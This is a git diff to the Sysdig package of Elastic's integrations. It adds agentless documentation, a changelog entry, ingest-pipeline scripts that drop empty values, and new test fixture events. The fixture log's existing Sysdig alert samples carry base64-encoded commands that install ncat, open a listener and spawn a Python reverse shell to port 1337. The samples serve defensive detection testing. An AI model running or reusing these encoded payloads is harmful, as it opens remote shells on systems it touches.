diff --git a/packages/sysdig/_dev/build/docs/README.md b/packages/sysdig/_dev/build/docs/README.md index e5cddbb5c0c..d559e894c29 100644 --- a/packages/sysdig/_dev/build/docs/README.md +++ b/packages/sysdig/_dev/build/docs/README.md @@ -26,6 +26,11 @@ Elastic Agent must be installed. For more details, check the Elastic Agent [inst Sysdig must be configured to output alerts to a supported output channel as defined in [Setup](#setup). The system will only receive common fields output by Sysdig's rules, meaning that if a rule does not include a desired field the rule must be edited in Sysdig to add the field. +## Agentless Enabled Integration + +Agentless integrations allow you to collect data without having to manage Elastic Agent in your cloud. They make manual agent deployment unnecessary, so you can focus on your data instead of the agent that collects it. For more information, refer to [Agentless integrations](https://www.elastic.co/guide/en/serverless/current/security-agentless-integrations.html) and the [Agentless integrations FAQ](https://www.elastic.co/guide/en/serverless/current/agentless-integration-troubleshooting.html). +Agentless deployments are only supported in Elastic Serverless and Elastic Cloud environments. This functionality is in beta and is subject to change. Beta features are not subject to the support SLA of official GA features. + ## Setup For step-by-step instructions on how to set up an integration, see the [Getting started](https://www.elastic.co/guide/en/starting-with-the-elasticsearch-platform-and-its-solutions/current/getting-started-observability.html) guide. diff --git a/packages/sysdig/changelog.yml b/packages/sysdig/changelog.yml index 77a249febc5..a36280ce435 100644 --- a/packages/sysdig/changelog.yml +++ b/packages/sysdig/changelog.yml 
@@ -1,4 +1,12 @@ # newer versions go on top +- version: "2.4.0" + changes: + - description: Enable Agentless deployment. + type: enhancement + link: https://github.com/elastic/integrations/pull/19470 + - description: Fix handling of null values in string for event data stream. + type: bugfix + link: https://github.com/elastic/integrations/pull/1 - version: "2.3.0" changes: - description: Enable request trace log removal. diff --git a/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log b/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log index f7c308133e9..12f8f8cbb5a 100644 --- a/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log +++ b/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log 
@@ -4,3 +4,5 @@ {"actions":[{"afterEventNs":30000000000,"beforeEventNs":15000000000,"errMsg":"maximum number of outstanding captures (1) reached","isSuccessful":false,"token":"7d30b372-3dd9-1234-5678-403612345678","type":"capture"}],"category":"runtime","content":{"fields":{"container.id":"382abcdefd0a","container.image.repository":"gcr.io/cadvisor/cadvisor","container.image.tag":"v0.45.0","container.mounts":"/:/rootfs::false:private,/var/run:/var/run::false:private,/sys:/sys::false:private,/var/lib/docker:/var/lib/docker::false:private,/dev/disk:/dev/disk::false:private,/var/lib/kubelet/pods/e08484f0-c944-4b62-bdb3-9341e74ef7b5/etc-hosts:/etc/hosts::true:private,/var/lib/kubelet/pods/e08484f0-c944-4b62-bdb3-9341e74ef7b5/containers/cadvisor/e5f5ac18:/dev/termination-log::true:private","container.name":"cadvisor","evt.res":"SUCCESS","evt.type":"execve","group.gid":"0","group.name":"root","proc.cmdline":"cadvisor -logtostderr --enable_metrics=cpu,diskIO,memory,network,oom_event --docker_only","proc.cwd":"/","proc.exepath":"/usr/bin/cadvisor","proc.name":"cadvisor","proc.pcmdline":"runc --root /run/containerd/runc/k8s.io --log /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a/log.json --log-format json --systemd-cgroup create --bundle /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a --pid-file /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a/init.pid 382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a","proc.pid":"741051","proc.pname":"runc","proc.ppid":"741043","proc.sid":"1","user.loginname":"","user.loginuid":"-1","user.name":"root","user.uid":"0"},"origin":"Sysdig","output":"Container cadvisor having image gcr.io/cadvisor/cadvisor with sensitive mount started by user root and parent runc (proc.name=cadvisor image=gcr.io/cadvisor/cadvisor:v0.45.0 
proc.exepath=/usr/bin/cadvisor proc.pname=runc gparent=containerd-shim ggparent=systemd gggparent= mounts=/:/rootfs::false:private,/var/run:/var/run::false:private,/sys:/sys::false:private,/var/lib/docker:/var/lib/docker::false:private,/dev/disk:/dev/disk::false:private,/var/lib/kubelet/pods/e08484f0-c944-4b62-bdb3-9341e74ef7b5/etc-hosts:/etc/hosts::true:private,/var/lib/kubelet/pods/e08484f0-c944-4b62-bdb3-9341e74ef7b5/containers/cadvisor/e5f5ac18:/dev/termination-log::true:private evt.type=execve evt.res=SUCCESS proc.pid=741051 proc.cwd=/ proc.ppid=741043 proc.pcmdline=runc --root /run/containerd/runc/k8s.io --log /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a/log.json --log-format json --systemd-cgroup create --bundle /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a --pid-file /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a/init.pid 382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a proc.sid=1 user.loginuid=-1 user.uid=0 user.loginname= group.gid=0 group.name=root container.id=382e35271d0a container.name=cadvisor)","policyId":10011701,"ruleName":"Launch Sensitive Mount 
Container","ruleSubType":0,"ruleTags":["container","container_best_practices","container_immutability","SOC2","SOC2_CC6.1","NIST","NIST_800-190","NIST_800-190_3.4.3","NIST_800-190_3.5.5","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","ISO","ISO_27001","ISO_27001_A.9.2.3","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","GDPR","GDPR_32.1","GDPR_32.2","MITRE","MITRE_T1609_container_administration_command","MITRE_T1611_escape_to_host","MITRE_TA0002_execution","MITRE_TA0004_privilege_escalation","MITRE_TA0008_lateral_movement","MITRE_T1610_deploy_container","MITRE_TA0005_defense_evasion","MITRE_T1055.009_process_injection_proc_memory","MITRE_T1543_create_or_modify_system_process","CIS","oss"],"ruleType":6,"type":"workloadRuntimeDetection"},"description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. 
Tuning will likely be required for the events generated from this policy.","engine":"falco","id":"1836ac8550123456789abcdefe5d827f","labels":{"container.image.digest":"sha256:9360d7421c5e9b646ea13e5ced3f8e6da80017b0144733a04b7401dd8c01a5cb","container.image.id":"3f3e5f568a6d","container.image.repo":"gcr.io/cadvisor/cadvisor","container.image.tag":"v0.45.0","container.label.io.kubernetes.container.name":"cadvisor","container.label.io.kubernetes.pod.name":"wave-autoscale-agent-abcde","container.label.io.kubernetes.pod.namespace":"wave-autoscale","container.name":"cadvisor","host.hostName":"hybrid-node","host.mac":"01:00:5e:90:10:02","kubernetes.cluster.name":"myclusterName","kubernetes.namespace.name":"wave-autoscale","kubernetes.node.name":"node04","kubernetes.pod.name":"wave-autoscale-agent-abcde"},"name":"Sysdig Runtime Notable Events","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":5,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1744701225528350000} {"category":"runtime","content":{"fields":{"container.id":"4db57cd1354c","container.name":"shell-scripting","group.gid":"0","group.name":"root","proc.cmdline":"bash -c echo IyEvYmluL2Jhc2gKYXB0IHVwZGF0ZSAteTsgYXB0IGluc3RhbGwgLXkgbmNhdApuYyAtbHYgMTMzNyAmCg== | base64 -d | sh; echo cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMC4wLjAuMCIsMTMzNykpO1tvcy5kdXAyKHMuZmlsZW5vKCksZilmb3IgZiBpbigwLDEsMildO3B0eS5zcGF3bihbInNoIiwgIi1jIiwgInNsZWVwIDU7bHMgLWE7IGV4aXQgMCJdKScK | base64 -d | sh","proc.cwd":"/","proc.exepath":"/usr/bin/bash","proc.hash.sha256":"7ebfc53f17925af4340d4218aafd16ba39b5afa8b6ac1f7adc3dd92952a2a237","proc.name":"bash","proc.pcmdline":"runc --root /run/containerd/runc/k8s.io --log /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe/log.json --log-format json --systemd-cgroup create --bundle 
/run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe --pid-file /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe/init.pid 4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe","proc.pid":"97888","proc.pname":"runc","proc.ppid":"97881","proc.sid":"1","user.loginname":"","user.loginuid":"-1","user.name":"root","user.uid":"0"},"origin":"Sysdig","output":"Potentially malicious Shell script base64-encoded under user root on shell-scripting (proc.name=bash proc.exepath=/usr/bin/bash proc.pname=runc gparent=containerd-shim ggparent=containerd-shim gggparent=containerd proc.cmdline=bash -c echo IyEvYmluL2Jhc2gKYXB0IHVwZGF0ZSAteTsgYXB0IGluc3RhbGwgLXkgbmNhdApuYyAtbHYgMTMzNyAmCg== | base64 -d | sh; echo cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMC4wLjAuMCIsMTMzNykpO1tvcy5kdXAyKHMuZmlsZW5vKCksZilmb3IgZiBpbigwLDEsMildO3B0eS5zcGF3bihbInNoIiwgIi1jIiwgInNsZWVwIDU7bHMgLWE7IGV4aXQgMCJdKScK | base64 -d | sh user.name=root proc.pid=97888 proc.cwd=/ proc.ppid=97881 proc.pcmdline=runc --root /run/containerd/runc/k8s.io --log /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe/log.json --log-format json --systemd-cgroup create --bundle /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe --pid-file /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe/init.pid 4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe proc.sid=1 user.uid=0 user.loginuid=-1 user.loginname= group.gid=0 group.name=root container.id=4db57cd1354c container.name=shell-scripting)","policyId":10011698,"ruleName":"Base64-encoded Shell Script 
Execution","ruleSubType":0,"ruleTags":["host","container","MITRE","MITRE_T1132.001_data_encoding_standard_encoding","MITRE_TA0011_command_and_control","MITRE_TA0005_defense_evasion","MITRE_T1059.004_command_and_scripting_interpreter_unix_shell","MITRE_T1059_command_and_scripting_interpreter","MITRE_TA0002_execution","MITRE_T1027_obfuscated_files_and_information","MITRE_T1140_deobfuscate_decode_files_or_information"],"ruleType":6,"type":"workloadRuntimeDetection"},"description":"This policy contains rules which Sysdig considers High Confidence of a security incident. They are tightly coupled to common attacker TTP's. They have been designed to minimize false positives but may still result in some depending on your environment.","engine":"falco","id":"183a5e0123456789zbcdef400ba6d116","labels":{"cloudProvider.account.id":"012345678912","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","container.image.digest":"sha256:aa7b73608abcfb021247bbb4c111435234a0459298a6da610681097a54ca2c2a","container.image.id":"ef0f72a55bd2","container.image.repo":"docker.io/library/python","container.image.tag":"3.9.18-slim","container.label.io.kubernetes.container.name":"shell-scripting","container.label.io.kubernetes.pod.name":"shell-scripting-1234567-12345","container.label.io.kubernetes.pod.namespace":"default","container.name":"shell-scripting","gcp.location":"us-central1","gcp.projectId":"012345678912","host.hostName":"gke-cluster-gcp-demo-san-default-pool-12345678-1234","host.mac":"01:00:5e:90:10:00","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.cronJob.name":"shell-scripting","kubernetes.job.name":"shell-scripting-29082780","kubernetes.namespace.name":"default","kubernetes.node.name":"gke-cluster-gcp-demo-san-default-pool-12345678-1234","kubernetes.pod.name":"shell-scripting-00123450-abcd5","kubernetes.workload.name":"shell-scripting","kubernetes.workload.type":"cronjob"},"name":"Sysdig Runtime Threat 
Detection","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":3,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1744966800841090300} {"category":"runtime","content":{"fields":{"container.image.repository":"docker.io/library/python","container.name":"shell-scripting","evt.res":"SUCCESS","evt.type":"execve","group.gid":"0","group.name":"root","proc.args":"","proc.cmdline":"sh","proc.cwd":"/","proc.exepath":"/usr/bin/dash","proc.hash.sha256":"f5adb8bf0100ed0f8c7782ca5f92814e9229525a4b4e0d401cf3bea09ac960a6","proc.name":"sh","proc.pcmdline":"bash -c echo IyEvYmluL2Jhc2gKYXB0IHVwZGF0ZSAteTsgYXB0IGluc3RhbGwgLXkgbmNhdApuYyAtbHYgMTMzNyAmCg== | base64 -d | sh; echo cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMC4wLjAuMCIsMTMzNykpO1tvcy5kdXAyKHMuZmlsZW5vKCksZilmb3IgZiBpbigwLDEsMildO3B0eS5zcGF3bihbInNoIiwgIi1jIiwgInNsZWVwIDU7bHMgLWE7IGV4aXQgMCJdKScK | base64 -d | sh","proc.pid":"4094247","proc.pid.ts":"1744772461104588229","proc.pname":"bash","proc.ppid":"4093769","proc.ppid.ts":"1744772400850031947","proc.sid":"1","user.loginname":"","user.loginuid":"-1","user.name":"root","user.uid":"0"},"origin":"Secure UI","output":"Custom rule. 
The shell-scripting with image docker.io/library/python by parent bash under user root (proc.name=sh proc.exepath-custom=/usr/bin/dash proc.pname=bash gparent=containerd-shim ggparent= gggparent= image=docker.io/library/python user.uid=0 proc.cmdline=sh proc.pcmdline=bash -c echo IyEvYmluL2Jhc2gKYXB0IHVwZGF0ZSAteTsgYXB0IGluc3RhbGwgLXkgbmNhdApuYyAtbHYgMTMzNyAmCg== | base64 -d | sh; echo cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMC4wLjAuMCIsMTMzNykpO1tvcy5kdXAyKHMuZmlsZW5vKCksZilmb3IgZiBpbigwLDEsMildO3B0eS5zcGF3bihbInNoIiwgIi1jIiwgInNsZWVwIDU7bHMgLWE7IGV4aXQgMCJdKScK | base64 -d | sh user.name=root user.loginuid=-1 proc.args= container.name=shell-scripting evt.type=execve evt.res=SUCCESS proc.pid=4094247 proc.cwd=/ proc.ppid=4093769 proc.sid=1 proc.exepath=/usr/bin/dash user.loginname= group.gid=0 group.name=root proc.pid.ts=1744772461104588229 proc.ppid.ts=1744772400850031947 proc.hash.sha256=f5adb8bf0100ed0f8c7782ca5f92814e9229525a4b4e0d401cf3bea09ac960a6)","policyId":10569534,"ruleName":"My test rule custom","ruleSubType":0,"ruleTags":["My-tag-custom-1-hello-world","MITTRE-WHATEVER"],"ruleType":6,"type":"workloadRuntimeDetection"},"description":"This is just a dumb policy to test custom 
policies","engine":"falco","id":"1a36a012345678998765432108f1e03e","labels":{"cloudProvider.account.id":"012345678912","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","container.image.digest":"sha256:aa7b73608abcfb021247bbb4c111435234a0459298a6da610681097a54ca2c2a","container.image.id":"ef0f72a55bd2","container.image.repo":"docker.io/library/python","container.image.tag":"3.9.18-slim","container.label.io.kubernetes.container.name":"shell-scripting","container.label.io.kubernetes.pod.name":"shell-scripting-29079540-cqf5n","container.label.io.kubernetes.pod.namespace":"default","container.name":"shell-scripting","gcp.location":"us-central1","gcp.projectId":"012345678912","host.hostName":"gke-cluster-gcp-demo-san-default-pool-12345678-abcd","host.mac":"01:00:5e:90:10:00","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.cronJob.name":"shell-scripting","kubernetes.job.name":"shell-scripting-29079540","kubernetes.namespace.name":"default","kubernetes.node.name":"gke-cluster-gcp-demo-san-default-pool-12345678-abcd","kubernetes.pod.name":"shell-scripting-12345678-abcde","kubernetes.workload.name":"shell-scripting","kubernetes.workload.type":"cronjob"},"name":"Manuel test policy","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":4,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1744772461195149800} +{"category":"runtime","content":{"fields":{"container.image.repository":"docker.io/manuelbcd/py-goat","container.name":"client","evt.type":"execve","fd.cport":"","fd.name":"","fd.sport":"","proc.cmdline":"g++ -c -I./liblinear -I./liblua payload.cc -o payload.o","proc.name":"g++","proc.pid":"{}","proc.ppid":"","proc.pid.ts":"1779960622186767074","proc.pname":"make","proc.ppid.ts":"1779960534106633936","proc.sid":"","user.loginname":"","user.loginuid":"-1","user.name":"root","user.uid":"0"},"origin":"Sysdig","policyId":10011704,"ruleName":"Launch Code Compiler Tool in 
Container","ruleSubType":0,"ruleTags":["container"],"ruleType":6,"type":"workloadRuntimeDetection"},"engine":"falco","id":"18b3b0c157a37ff81ee0ffde058bb9c7","labels":{},"name":"Sysdig Runtime Activity Logs","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":7,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1779960622186987500} +{"category":"runtime","content":{"fields":{"container.name":"client","evt.type":"execve","proc.cmdline":"g++ -c","proc.name":"g++","proc.pid.ts":"1779968132639147461","proc.pname":"make","proc.ppid.ts":"1779968024206444718","user.name":"root","user.uid":"0"},"origin":"Sysdig","output":"Detected a code compiler g++ usage on client","policyId":10011704,"ruleName":"Launch Code Compiler Tool in Container","ruleSubType":0,"ruleTags":["container"],"ruleType":6,"type":"workloadRuntimeDetection"},"description":"Runtime activity","engine":"falco","id":"18b3b796017bece0da1278186b9f1333","labels":{"container.name":"client"},"name":"Sysdig Runtime Activity Logs","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":7,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1779968132639354000} diff --git a/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log-expected.json b/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log-expected.json index fd8bb28f399..de3cdc7c7aa 100644 --- a/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log-expected.json +++ b/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log-expected.json 
@@ -1621,6 +1621,223 @@ "id": "0", "name": "root" } + }, + { + "@timestamp": "2026-05-28T09:30:22.1869875Z", + "container": { + "image": { + "name": "docker.io/manuelbcd/py-goat" + }, + "name": "client" + }, + "ecs": { + "version": "8.17.0" + }, + "event": { + "category": [ + "process" + ], + "id": "18b3b0c157a37ff81ee0ffde058bb9c7", + "kind": "event", + "original": "{\"category\":\"runtime\",\"content\":{\"fields\":{\"container.image.repository\":\"docker.io/manuelbcd/py-goat\",\"container.name\":\"client\",\"evt.type\":\"execve\",\"fd.cport\":\"\",\"fd.name\":\"\",\"fd.sport\":\"\",\"proc.cmdline\":\"g++ -c -I./liblinear -I./liblua payload.cc -o payload.o\",\"proc.name\":\"g++\",\"proc.pid\":\"{}\",\"proc.ppid\":\"\",\"proc.pid.ts\":\"1779960622186767074\",\"proc.pname\":\"make\",\"proc.ppid.ts\":\"1779960534106633936\",\"proc.sid\":\"\",\"user.loginname\":\"\",\"user.loginuid\":\"-1\",\"user.name\":\"root\",\"user.uid\":\"0\"},\"origin\":\"Sysdig\",\"policyId\":10011704,\"ruleName\":\"Launch Code Compiler Tool in Container\",\"ruleSubType\":0,\"ruleTags\":[\"container\"],\"ruleType\":6,\"type\":\"workloadRuntimeDetection\"},\"engine\":\"falco\",\"id\":\"18b3b0c157a37ff81ee0ffde058bb9c7\",\"labels\":{},\"name\":\"Sysdig Runtime Activity Logs\",\"originator\":\"policy\",\"rawEventCategory\":\"runtime\",\"rawEventOriginator\":\"linuxAgent\",\"severity\":7,\"source\":\"syscall\",\"sourceDetails\":{\"subType\":\"container\",\"type\":\"workload\"},\"timestamp\":1779960622186987500}", + "provider": "syscall", + "severity": 7, + "type": [ + "info" + ] + }, + "observer": { + "product": "Sysdig Secure", + "vendor": "Sysdig" + }, + "process": { + "command_line": "g++ -c -I./liblinear -I./liblua payload.cc -o payload.o", + "name": "g++", + "parent": { + "name": "make", + "start": "2026-05-28T09:28:54.106633936Z" + }, + "start": "2026-05-28T09:30:22.186767074Z" + }, + "related": { + "user": [ + "root", + "0" + ] + }, + "rule": { + "name": "Launch Code Compiler Tool in 
Container", + "ruleset": "Sysdig Runtime Activity Logs" + }, + "sysdig": { + "event": { + "category": "runtime", + "content": { + "fields": { + "container": { + "image": { + "repository": "docker.io/manuelbcd/py-goat" + }, + "name": "client" + }, + "evt": { + "type": "execve" + }, + "proc": { + "cmdline": "g++ -c -I./liblinear -I./liblua payload.cc -o payload.o", + "name": "g++", + "pid_ts": "2026-05-28T09:30:22.186767074Z", + "pname": "make", + "ppid_ts": "2026-05-28T09:28:54.106633936Z" + }, + "user": { + "name": "root", + "uid": "0" + } + }, + "origin": "Sysdig", + "policy_id": "10011704", + "rule_name": "Launch Code Compiler Tool in Container", + "rule_sub_type": 0, + "rule_tags": [ + "container" + ], + "rule_type": 6, + "type": "workloadRuntimeDetection" + }, + "engine": "falco", + "id": "18b3b0c157a37ff81ee0ffde058bb9c7", + "name": "Sysdig Runtime Activity Logs", + "originator": "policy", + "raw_event_category": "runtime", + "raw_event_originator": "linuxAgent", + "severity": 7, + "severity_value": "Info", + "source": "syscall", + "source_details": { + "sub_type": "container", + "type": "workload" + }, + "timestamp": "2026-05-28T09:30:22.1869875Z" + } + }, + "tags": [ + "preserve_duplicate_custom_fields" + ], + "user": { + "id": "0", + "name": "root" + } + }, + { + "@timestamp": "2026-05-28T11:35:32.639354Z", + "container": { + "name": "client" + }, + "ecs": { + "version": "8.17.0" + }, + "event": { + "category": [ + "process" + ], + "id": "18b3b796017bece0da1278186b9f1333", + "kind": "event", + "original": "{\"category\":\"runtime\",\"content\":{\"fields\":{\"container.name\":\"client\",\"evt.type\":\"execve\",\"proc.cmdline\":\"g++ -c\",\"proc.name\":\"g++\",\"proc.pid.ts\":\"1779968132639147461\",\"proc.pname\":\"make\",\"proc.ppid.ts\":\"1779968024206444718\",\"user.name\":\"root\",\"user.uid\":\"0\"},\"origin\":\"Sysdig\",\"output\":\"Detected a code compiler g++ usage on client\",\"policyId\":10011704,\"ruleName\":\"Launch Code Compiler Tool in 
Container\",\"ruleSubType\":0,\"ruleTags\":[\"container\"],\"ruleType\":6,\"type\":\"workloadRuntimeDetection\"},\"description\":\"Runtime activity\",\"engine\":\"falco\",\"id\":\"18b3b796017bece0da1278186b9f1333\",\"labels\":{\"container.name\":\"client\"},\"name\":\"Sysdig Runtime Activity Logs\",\"originator\":\"policy\",\"rawEventCategory\":\"runtime\",\"rawEventOriginator\":\"linuxAgent\",\"severity\":7,\"source\":\"syscall\",\"sourceDetails\":{\"subType\":\"container\",\"type\":\"workload\"},\"timestamp\":1779968132639354000}", + "provider": "syscall", + "severity": 7, + "type": [ + "info" + ] + }, + "message": "Detected a code compiler g++ usage on client", + "observer": { + "product": "Sysdig Secure", + "vendor": "Sysdig" + }, + "process": { + "command_line": "g++ -c", + "name": "g++", + "parent": { + "name": "make", + "start": "2026-05-28T11:33:44.206444718Z" + }, + "start": "2026-05-28T11:35:32.639147461Z" + }, + "related": { + "user": [ + "root", + "0" + ] + }, + "rule": { + "description": "Runtime activity", + "name": "Launch Code Compiler Tool in Container", + "ruleset": "Sysdig Runtime Activity Logs" + }, + "sysdig": { + "event": { + "category": "runtime", + "content": { + "fields": { + "container": { + "name": "client" + }, + "evt": { + "type": "execve" + }, + "proc": { + "cmdline": "g++ -c", + "name": "g++", + "pid_ts": "2026-05-28T11:35:32.639147461Z", + "pname": "make", + "ppid_ts": "2026-05-28T11:33:44.206444718Z" + }, + "user": { + "name": "root", + "uid": "0" + } + }, + "origin": "Sysdig", + "output": "Detected a code compiler g++ usage on client", + "policy_id": "10011704", + "rule_name": "Launch Code Compiler Tool in Container", + "rule_sub_type": 0, + "rule_tags": [ + "container" + ], + "rule_type": 6, + "type": "workloadRuntimeDetection" + }, + "description": "Runtime activity", + "engine": "falco", + "id": "18b3b796017bece0da1278186b9f1333", + "labels": { + "container": { + "name": "client" + } + }, + "name": "Sysdig Runtime Activity 
Logs", + "originator": "policy", + "raw_event_category": "runtime", + "raw_event_originator": "linuxAgent", + "severity": 7, + "severity_value": "Info", + "source": "syscall", + "source_details": { + "sub_type": "container", + "type": "workload" + }, + "timestamp": "2026-05-28T11:35:32.639354Z" + } + }, + "tags": [ + "preserve_duplicate_custom_fields" + ], + "user": { + "id": "0", + "name": "root" + } } ] } diff --git a/packages/sysdig/data_stream/event/elasticsearch/ingest_pipeline/default.yml b/packages/sysdig/data_stream/event/elasticsearch/ingest_pipeline/default.yml index 3396c4b8b2d..a508bcd2c98 100644 --- a/packages/sysdig/data_stream/event/elasticsearch/ingest_pipeline/default.yml +++ b/packages/sysdig/data_stream/event/elasticsearch/ingest_pipeline/default.yml @@ -30,6 +30,33 @@ processors: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - script: + description: Remove Sysdig null values from the parsed event JSON before any type conversion. + tag: script_remove_string_null_values_ + lang: painless + if: ctx.json != null + source: | + void handleMap(Map map) { + map.values().removeIf(v -> { + if (v instanceof Map) { + handleMap(v); + } else if (v instanceof List) { + handleList(v); + } + return v == '' || v == '{}' || (v instanceof Map && v.size() == 0) || (v instanceof List && v.size() == 0) + }); + } + void handleList(List list) { + list.removeIf(v -> { + if (v instanceof Map) { + handleMap(v); + } else if (v instanceof List) { + handleList(v); + } + return v == '' || v == '{}' || (v instanceof Map && v.size() == 0) || (v instanceof List && v.size() == 0) + }); + } + handleMap(ctx.json); - set: field: observer.vendor tag: set_observer_vendor 
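Review bot: The new `script_remove_string_null_values_` processor is guarded only by `if: ctx.json != null`, but `handleMap(ctx.json)` requires a Map, so a decoded body that is a JSON array or scalar would make the script throw instead of being skipped; the guards added later in this same change use `instanceof Map`, and `if: ctx.json instanceof Map` would make this one consistent with them. The tag carries a trailing underscore (`script_remove_string_null_values_`), which looks accidental and will surface verbatim in `error.message` on failure; `tag: script_remove_string_null_values` reads cleaner. The `v == '{}'` clause is the non-obvious part of the filter and deserves a comment so nobody "fixes" it away, e.g. `# Sysdig emits the literal string "{}" for fields it could not resolve (see "proc.pid":"{}" in the pipeline fixture), so treat it like an empty value.` — I am inferring that meaning from the fixture, so confirm it against Sysdig's output format before wording it as fact.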
@@ -181,6 +208,21 @@ processors: tag: rename_content_fields_proc_ppid_ts target_field: sysdig.event.content.fields.proc.ppid_ts ignore_missing: true + - script: + description: Remove empty proc.pid and proc.ppid maps left after timestamp field expansion. + tag: script_sanitize_proc_timestamp_maps + lang: painless + if: ctx.sysdig?.event?.content?.fields instanceof Map && (ctx.sysdig.event.content.fields['proc.pid.ts'] != null || ctx.sysdig.event.content.fields['proc.ppid.ts'] != null || ctx.sysdig?.event?.content?.fields?.proc?.pid_ts != null || ctx.sysdig?.event?.content?.fields?.proc?.ppid_ts != null) + source: | + if (ctx.sysdig.event.content.fields.proc instanceof Map) { + def proc = ctx.sysdig.event.content.fields.proc; + if (proc.containsKey('pid') && proc.pid instanceof Map && proc.pid.size() == 0) { + proc.remove('pid'); + } + if (proc.containsKey('ppid') && proc.ppid instanceof Map && proc.ppid.size() == 0) { + proc.remove('ppid'); + } + } - dot_expander: field: ct.user tag: dot_expander_ct_user @@ -200,6 +242,7 @@ processors: tag: dot_expander_content_fields path: sysdig.event.content.fields override: true + if: ctx.sysdig?.event?.content?.fields instanceof Map on_failure: - append: field: error.message @@ -1020,6 +1063,7 @@ processors: field: '*' tag: dot_expander_labels path: sysdig.event.labels + if: ctx.sysdig?.event?.labels instanceof Map on_failure: - append: field: error.message @@ -1477,7 +1521,7 @@ processors: } else if (v instanceof List) { handleList(v); } - return v == null || v == '' || v == '' || v == '-1' ||(v instanceof Map && v.size() == 0) || (v instanceof List && v.size() == 0) + return v == null || v == '' || v == '' || v == '-1' || v == '{}' || (v instanceof Map && v.size() == 0) || (v instanceof List && v.size() == 0) }); } void handleList(List list) { 
